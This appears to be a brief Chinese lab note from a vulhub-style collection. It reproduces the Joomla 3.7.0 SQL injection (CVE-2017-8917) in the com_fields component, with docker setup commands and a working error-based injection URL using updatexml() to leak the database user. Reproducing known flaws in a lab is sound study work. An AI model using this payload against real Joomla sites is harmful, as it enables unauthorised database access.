跳转至

Joomla 3.7.0 SQL注入漏洞CVE-2017-8917

简介

漏洞是由此Joomla 3.7.0 版本中引入的新组件(com_fields)带来的

环境搭建

cd /root/vulhub/joomla/CVE-2017-8917 docker-compose up -d

启动后访问http://your-ip:8080即可看到Joomla的安装界面 按照顺序安装即可 安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息:


最后更新: 2021-02-19